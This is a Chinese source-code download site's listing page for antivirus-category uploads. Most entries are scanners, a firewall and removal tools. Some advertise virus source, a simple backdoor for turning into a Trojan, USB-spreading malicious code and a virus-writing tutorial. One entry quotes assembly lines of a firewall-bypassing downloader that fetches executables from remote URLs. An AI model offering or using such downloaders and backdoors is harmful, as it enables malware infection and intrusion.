CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 源码下载 其它 杀毒 搜索资源 - CAN程序

搜索资源列表

  1. A780c

    0下载:
  2. 一种病毒的源码,熟悉之后就可以针对这种病毒写出破解程序.-a source of the virus, after the familiar against the virus can write crack procedures.
  3. 所属分类:杀毒

    • 发布日期:2008-10-13
    • 文件大小:1468356
    • 提供者:周苗
  1. KillIexplores

    0下载:
  2. Iexplorer专杀程序 能够较好的杀死和清除Iexplorer 病毒及其相关自动运行文件,能够识别它的多个变种.-Iexplorer the scrapping process can be used to kill and remove the virus and Iexplorer Automatic operation of the relevant documents, to be able to identify its variants.
  3. 所属分类:杀毒

    • 发布日期:2008-10-13
    • 文件大小:15380
    • 提供者:孙先声
  1. 200506152365

    0下载:
  2. 一个商品化的杀毒程序,可以分析病毒的种类及具有一定能力的查杀功能!-a commercialization of anti-virus procedures, the virus can be analyzed and certain types of killing function!
  3. 所属分类:杀毒

    • 发布日期:2008-10-13
    • 文件大小:456712
    • 提供者:苗夏菁
  1. BOOTHORS病毒源程序

    0下载:
  2. BOOTHORS病毒源程序他可以在DOS下直接杀毒是一个不错的程序-BOOTHORS virus source he can directly under DOS is a good antivirus procedures
  3. 所属分类:杀毒

    • 发布日期:2008-10-13
    • 文件大小:2089
    • 提供者:taf
  1. wehntrust

    1下载:
  2. 金山卫士开源了,很开心可以学点东西了,很遗憾,核心的技术仍然处于保密状态,金山的答复是,不想让别有用心的流氓学会了,那就意味着,良民们能看的也就是应用层的东西了,主动防御在驱动层是如何实现的,黑客和杀软在驱动层是怎样进行明争暗斗的,这份代码包括完整的驱动程序,和应用层代码,至少可以回答这些问题。-Jinshan guards open source, and very happy to learn something, and unfortunately, the core technology
  3. 所属分类:Kill Virus

    • 发布日期:2014-08-31
    • 文件大小:2703360
    • 提供者:changming
  1. CMDSHELL3

    0下载:
  2. cmd管道实现的简单后门程序,可以修改为木马程序。-cmd pipe to achieve a simple backdoor, you can modify for the Trojans.
  3. 所属分类:Kill Virus

    • 发布日期:2017-04-01
    • 文件大小:687436
    • 提供者:随大家
  1. antinimda

    0下载:
  2. 查杀nimda(尼姆达)病毒的程序,含扫描内存部分。-A program which can scan and kill the nimda virus , and includes the part of scanning memory
  3. 所属分类:Kill Virus

    • 发布日期:2017-11-12
    • 文件大小:190160
    • 提供者:站长
  1. Downloader[FWB]_New

    0下载:
  2. 编译说明:{ 程序采用DLL插入--9x 和NT下都可以插入 穿防火墙,可以自定义三条连接 后面两个还可以休眠5秒后运行--具体看代码 程序编译压缩后只有2.7k } 首先打开dlldownloader.asm文件~ url1s byte http://www.Anskya.Net/1.exe , 0 url2s byte http://www.Anskya.Net/2.exe , 0 url3s byte http://www.Anskya.Net/2.ex
  3. 所属分类:Kill Virus

    • 发布日期:2017-03-24
    • 文件大小:29217
    • 提供者:张启航
  1. bingdusaomiaogongju

    0下载:
  2. 本程序允许用户自定义病毒特征码,定义方法可见help.htm.采用第一代病毒扫描技术,免费开源的程序-The program allows users to customize the virus signature, the definition of methods can be seen help.htm. With the first generation of virus scanning technology, free open source program
  3. 所属分类:Kill Virus

    • 发布日期:2017-04-09
    • 文件大小:2032966
    • 提供者:菜客
  1. clamAVsrc

    0下载:
  2. Clam AntiVirus 是一款 UNIX 下开源的 (GPL) 反病毒工具包,专为邮件网关上的电子邮件扫描而设计。该工具包提供了包含灵活且可伸缩的监控程序、命令行扫描程序以及用于自动更新数据库的高级工具在内的大量实用程序。该工具包的核心在于可用于各类场合的反病毒引擎共享库。-Clam AntiVirus is an open source under UNIX (GPL) anti-virus toolkit for e-mail scanning on mail gateways des
  3. 所属分类:Kill Virus

    • 发布日期:2017-06-11
    • 文件大小:18910327
    • 提供者:yu
  1. vbFirewallsrc

    1下载:
  2. VB开发的高级防火墙源码专业味十足的一款防火墙软件,用VB语言开发,保护你的计算机安全。可以限定规则,适合监视应用程序及网络端口的功能。 -VB source code of professional development of the advanced firewall flavor of a firewall software, using VB language development, protect your computer security. Can define rules
  3. 所属分类:Kill Virus

    • 发布日期:2017-04-03
    • 文件大小:574961
    • 提供者:Alili
  1. bingdu

    0下载:
  2. 在你看之前,你应该知道这只是篇可以带你入门的文章,如果你已经会了就不用看了。看的时候最好 准备个 PE 表在旁边。写病毒程序可以使用很多种语言来写比如 C,汇编,甚至有人用 Dephi 这样可视化编 程工具都能写出来。但是最适合写病毒程序的还是汇编语言。汇编语言底层,灵活,速度快,体积小的优 势能将一个病毒程序发挥到极至,通常一个程序写出来才几千字节就包含了所有的功能。一般一个病毒都 有如下几个功能:-Before you look, you should know that
  3. 所属分类:Kill Virus

    • 发布日期:2017-03-30
    • 文件大小:434891
    • 提供者:xietao
  1. Prevent-AutoPlay

    0下载:
  2. 阻止程序自动播放,可阻止很多病毒软件利用自动播放功能侵入系统-Prevent the program automatically play, can prevent a lot of virus software into the system using auto-play function
  3. 所属分类:Kill Virus

    • 发布日期:2017-04-01
    • 文件大小:16791
    • 提供者:zh
  1. ruqinshiyan

    0下载:
  2. 入侵检测程序训练样本过程,得到可检测未知入侵的预警机-Intrusion detection program training sample process, the AWACS can detect unknown intrusion
  3. 所属分类:Kill Virus

    • 发布日期:2017-11-12
    • 文件大小:2725
    • 提供者:sherry
  1. Chinese-soul-security-guards

    0下载:
  2. 中国Hackers界制作的第一款和平软件-中华魂安全卫士v07.08.20.39,因为本应用检测程序编辑框架较为特殊,没有任何让您担心的,您放心使用,祝您天天快心,中华魂安全卫士为您保驾护航! 应用介绍: 软件名称:中华魂安全卫士 版本:v07.08.20.39 软件大小:1.11 MB 语言:简体中文 支持系统:windows 其他:支持官方在线自动更新 我们保证:本杀软虽然没有本地病毒库,但本人保证您在不联网的情况下使用我们这款软件的特
  3. 所属分类:Kill Virus

    • 发布日期:2017-05-01
    • 文件大小:717422
    • 提供者:温亚夕
  1. 0133600

    0下载:
  2. 恶意代码,WIN32运行,运行后双击程序,再插入U盘可以实现不停的自我辅助-Malicious code, WIN32 run, run after double click the program, and then insert the U disk can be achieved without stopping
  3. 所属分类:Kill Virus

    • 发布日期:2017-05-03
    • 文件大小:735218
    • 提供者:五星
  1. Hacker-Programming

    0下载:
  2. winows环境下黑客编程,程序可以调试运行,与《C++黑客编程揭秘与防范》书籍配套-Under winows hacker programming environment, the program can run debugging, and " C++ Secret hacker program and prevent" books matching
  3. 所属分类:Kill Virus

    • 发布日期:2017-06-11
    • 文件大小:18242960
    • 提供者:李晓飞
搜珍网 www.dssz.com